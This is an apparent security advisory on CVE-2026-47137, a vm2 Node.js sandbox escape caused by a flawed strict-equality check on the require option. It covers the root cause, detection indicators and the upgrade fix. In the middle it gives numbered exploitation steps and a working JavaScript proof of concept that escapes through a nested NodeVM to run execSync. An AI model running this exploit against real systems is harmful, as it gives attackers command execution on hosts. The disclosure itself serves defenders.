CVE-2026-47137: 
JavaScript 취약성 분석 및 완화

CVE-2026-47137 is a sandbox escape vulnerability in the vm2 Node.js sandboxing library that allows unauthenticated remote attackers to achieve full Remote Code Execution (RCE) on the host system. It affects all versions of vm2 up to and including 3.11.3, with the fix released in version 3.11.4. The vulnerability is a bypass of the prior patch for CVE-2023-37903 (GHSA-8hg8-63c5-gwmx), published on May 18, 2026, and added to the GitHub Advisory Database on May 29, 2026. It carries a CVSS v3.1 base score of 10.0 (Critical) (GitHub Advisory, vm2 Security Advisory).

The root cause is an incorrect comparison (CWE-697) and improper control of dynamically-managed code resources (CWE-913) in lib/nodevm.js. The prior patch for CVE-2023-37903 added a guard at line 263 using strict equality (options.require === false) to block the dangerous combination of nesting: true and require: false. However, when the require option is omitted entirely, options.require evaluates to undefined, causing the strict equality check to fail silently. Immediately after, at line 280, the destructuring default require: requireOpts = false assigns requireOpts = false, recreating the exact insecure configuration the patch was designed to prevent — a NESTING_OVERRIDE-only resolver that exposes the vm2 package to sandbox code. The fix in v3.11.4 restructures the check to destructure options first and then evaluate nesting && !hasRealRequireConfig, where hasRealRequireConfig requires requireOpts to be a non-null object or a Resolver instance (GitHub Advisory, Patch Commit).

Successful exploitation results in full Remote Code Execution on the host system with the privileges of the Node.js process running the vm2 sandbox. An attacker whose code executes inside a vulnerable NodeVM({ nesting: true }) instance can escape the sandbox entirely, access any host module including child_process and fs, execute arbitrary OS commands, read or modify sensitive files, and pivot to further compromise the underlying infrastructure. The scope is marked as Changed in CVSS, reflecting that the impact extends beyond the sandboxed component to the host system (vm2 Security Advisory, GitHub Advisory).

1. Identify a vulnerable target: Locate an application using vm2 version ≤ 3.11.3 that instantiates NodeVM with nesting: true and without an explicit require config object (e.g., new NodeVM({ nesting: true })).
2. Supply malicious code to the sandbox: Provide attacker-controlled JavaScript to be executed by the vulnerable NodeVM instance — this could be via a user-facing code execution feature, a plugin system, or any other mechanism that passes untrusted code to nvm.run().
3. Require vm2 from inside the sandbox: Within the sandboxed code, call require('vm2') to obtain the vm2 library. This succeeds because the NESTING_OVERRIDE builtin unconditionally injects vm2 into the resolver regardless of the outer require configuration.
4. Construct an unconstrained inner NodeVM: Use the obtained NodeVM constructor to create a new inner sandbox with an attacker-chosen require config: new NodeVM({ require: { builtin: ['child_process'] } }).
5. Execute arbitrary OS commands: Run code in the inner VM that loads child_process and calls execSync or exec with any desired OS command, achieving full RCE as the host process user:

const { NodeVM } = require('vm2');
const inner = new NodeVM({ require: { builtin: ['child_process'] } });
module.exports = inner.run(
  "module.exports = require('child_process').execSync('id').toString()",
  'exploit.js'
);

(GitHub Advisory, vm2 Security Advisory)

• Logs: Node.js application logs showing unexpected calls to child_process methods (execSync, exec, spawn) originating from within a vm2 sandbox context; error logs referencing VMError related to nesting and require configuration (post-patch).
• Process: Unusual child processes spawned by the Node.js process running vm2 (e.g., /bin/sh, cmd.exe, curl, wget, python) with no expected application-level trigger; unexpected network connections initiated by the Node.js process.
• File System: New or modified files created by the Node.js process in unexpected directories (e.g., web shells, cron jobs, SSH authorized_keys modifications); unexpected reads of sensitive files such as /etc/passwd, /etc/shadow, or application secrets.
• Network: Outbound connections from the Node.js server process to unknown external IPs, particularly on non-standard ports, which may indicate reverse shell or data exfiltration activity.
• Code Review: Presence of new NodeVM({ nesting: true }) without an explicit require config object in application source code or dependencies using vm2 ≤ 3.11.3; sandbox-executed code containing require('vm2') calls.

Upgrade vm2 to version 3.11.4 or later, which restructures the security check in lib/nodevm.js to evaluate the destructured requireOpts value rather than the raw options.require input, closing the bypass for all falsy and omitted require shapes (vm2 Release). As a temporary workaround if upgrading immediately is not possible, explicitly pass a require config object when using nesting: true (e.g., new NodeVM({ nesting: true, require: { builtin: [] } })), or remove nesting: true entirely from any NodeVM configuration used with untrusted code. Note that nesting: true is fundamentally an escape hatch and should never be used with untrusted code regardless of the require setting (GitHub Advisory).

The vulnerability received coverage from Heise Online, which reported on four critical vm2 vulnerabilities with maximum CVSS ratings being addressed in the v3.11.4 release (Heise Online). The CVE was also highlighted in community tracking resources such as Reddit's CVEWatch and security monitoring platforms including BeyondMachines, which noted the critical sandbox escape enabling remote code execution. The vulnerability was credited to researcher q1uf3ngONEKEY (vm2 Security Advisory).